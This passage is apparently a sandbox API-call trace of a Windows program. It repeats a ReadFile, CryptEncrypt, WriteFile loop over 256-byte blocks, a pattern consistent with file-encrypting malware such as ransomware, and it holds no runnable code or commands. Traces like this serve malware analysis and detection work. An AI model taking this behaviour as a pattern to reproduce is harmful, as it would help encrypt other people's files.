pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.282] GetLastError () returned 0x0 [0145.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.282] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.282] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.282] GetLastError () returned 0x0 [0145.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.282] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.282] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.283] GetLastError () returned 0x0 [0145.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.283] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.283] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.283] GetLastError () returned 0x0 [0145.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.283] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.283] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.283] GetLastError () returned 0x0 [0145.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.283] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.283] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.283] GetLastError () returned 0x0 [0145.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.283] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.283] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.283] GetLastError () returned 0x0 [0145.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.283] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.283] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.283] GetLastError () returned 0x0 [0145.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.283] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.283] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.283] GetLastError () returned 0x0 [0145.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.283] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.284] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.284] GetLastError () returned 0x0 [0145.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.284] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.284] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.284] GetLastError () returned 0x0 [0145.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.284] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.284] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.284] GetLastError () returned 0x0 [0145.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.284] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.284] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.284] GetLastError () returned 0x0 [0145.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.284] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.284] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.284] GetLastError () returned 0x0 [0145.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.284] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.284] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.284] GetLastError () returned 0x0 [0145.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.284] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.284] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.284] GetLastError () returned 0x0 [0145.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.285] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.285] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.285] GetLastError () returned 0x0 [0145.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.285] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.285] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.285] GetLastError () returned 0x0 [0145.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.285] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.285] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.285] GetLastError () returned 0x0 [0145.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.285] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.285] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.285] GetLastError () returned 0x0 [0145.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.285] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.285] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.285] GetLastError () returned 0x0 [0145.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.285] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.285] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.285] GetLastError () returned 0x0 [0145.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.286] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.286] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.286] GetLastError () returned 0x0 [0145.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.286] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.286] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.286] GetLastError () returned 0x0 [0145.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.286] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.286] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.286] GetLastError () returned 0x0 [0145.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.286] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.286] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.286] GetLastError () returned 0x0 [0145.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.286] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.286] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.286] GetLastError () returned 0x0 [0145.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.286] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.286] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.286] GetLastError () returned 0x0 [0145.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.286] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.287] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.287] GetLastError () returned 0x0 [0145.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.287] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.287] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.287] GetLastError () returned 0x0 [0145.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.287] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.287] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.287] GetLastError () returned 0x0 [0145.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.287] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.287] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.287] GetLastError () returned 0x0 [0145.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.287] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.287] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.287] GetLastError () returned 